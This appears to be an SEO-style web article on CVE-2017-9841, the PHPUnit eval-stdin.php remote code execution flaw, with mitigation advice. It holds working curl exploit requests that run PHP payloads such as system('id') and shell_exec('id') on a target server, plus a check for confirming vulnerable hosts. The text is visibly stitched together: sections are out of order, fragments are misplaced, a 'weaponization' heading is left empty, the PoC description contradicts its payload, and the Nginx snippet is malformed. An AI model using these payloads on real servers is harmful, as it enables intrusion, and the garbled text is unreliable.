Eval-stdin.php Exploit - Vendor Phpunit Phpunit Src Util Php

The content regarding vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php refers to CVE-2017-9841, a critical Remote Code Execution (RCE) vulnerability in the PHPUnit testing framework. Although discovered in 2017, it remains a frequent target for automated scanners and malware like Androxgh0st because it is often accidentally left in production environments. Vulnerability Mechanism

The flaw exists in how the eval-stdin.php script handles input. CVE-2017-9841 Detail - NVD

3. Exploitation Steps

Prerequisites:

• The target server is running a vulnerable version of PHPUnit.
• The vendor directory is accessible via the web.

The Attack Vector: Attackers scan the internet (or specific targets) looking for the specific path of this file. Once found, they send a POST request containing the payload.

Proof of Concept (PoC):

Using curl, an attacker can verify the vulnerability by causing the server to execute the phpinfo() function:

curl -X POST http://target-site.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php \
     -d "<?php echo 'VULNERABLE'; ?>"

If the response contains "VULNERABLE", the target is compromised. vendor phpunit phpunit src util php eval-stdin.php exploit

Remote Code Execution (RCE):

To achieve a reverse shell or system command execution:

curl -X POST http://target-site.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php \
     -d "<?php system('id'); ?>"

Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)

Automated Exploitation: This vulnerability is included in the Metasploit Framework (exploit/multi/http/phpunit_eval stdin), making exploitation trivial for unskilled attackers.

4.3 Directory Structure

Best practices dictate that the vendor directory should be stored outside the web-accessible root (e.g., one level above public_html). The application should bootstrap from the public folder while keeping dependencies private.

A note on "False Positives"

Sometimes, a 200 OK response might come from a custom error handler or a dummy file. To confirm, send a benign mathematical operation: The target server is running a vulnerable version of PHPUnit

curl -X POST https://target.com/eval-stdin.php -d "<?php echo 5*5; ?>"

If the response contains 25, it is 100% vulnerable.

Long-term Prevention

• Never deploy development dependencies to production. Use Composer with the --no-dev flag:

  composer install --no-dev --optimize-autoloader
  

• Block direct access to vendor/ via web server configuration.

  Apache (.htaccess):

  <Directory "vendor">
      Require all denied
  </Directory>
  

  Nginx:

  location ~ /vendor/ 
      deny all;
      return 403;
  

• Set your DocumentRoot to the /public subdirectory (as many modern frameworks do). This prevents navigating up into vendor/. Response: If successful

• Use a Web Application Firewall (WAF) with rules to block eval-stdin.php and php://input abuse. Example ModSecurity rule:

  SecRule REQUEST_URI "eval-stdin\.php" "id:10001,deny,status:403,msg:'PHPUnit RCE attempt'"
  

The Weaponization Process

An attacker would typically follow these steps:

Impact and risk factors

• Severity: critical (unauthenticated RCE).
• Impact depends on webserver privileges: from site defacement to full system compromise and lateral movement.
• High exploitability: simple HTTP requests suffice when file is present.
• Persistent consequences: backdoors, credential theft, database compromise, long-term footholds.

3.2 Proof of Concept (PoC)

An attacker can utilize curl to execute arbitrary system commands. The following payload sends a system command to the server and expects the output in the response.

Request:

curl -X POST http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php \
     -d "<?php echo shell_exec('id'); ?>"

Response: If successful, the server will execute the id command and return the output:

uid=33(www-data) gid=33(www-data) groups=33(www-data)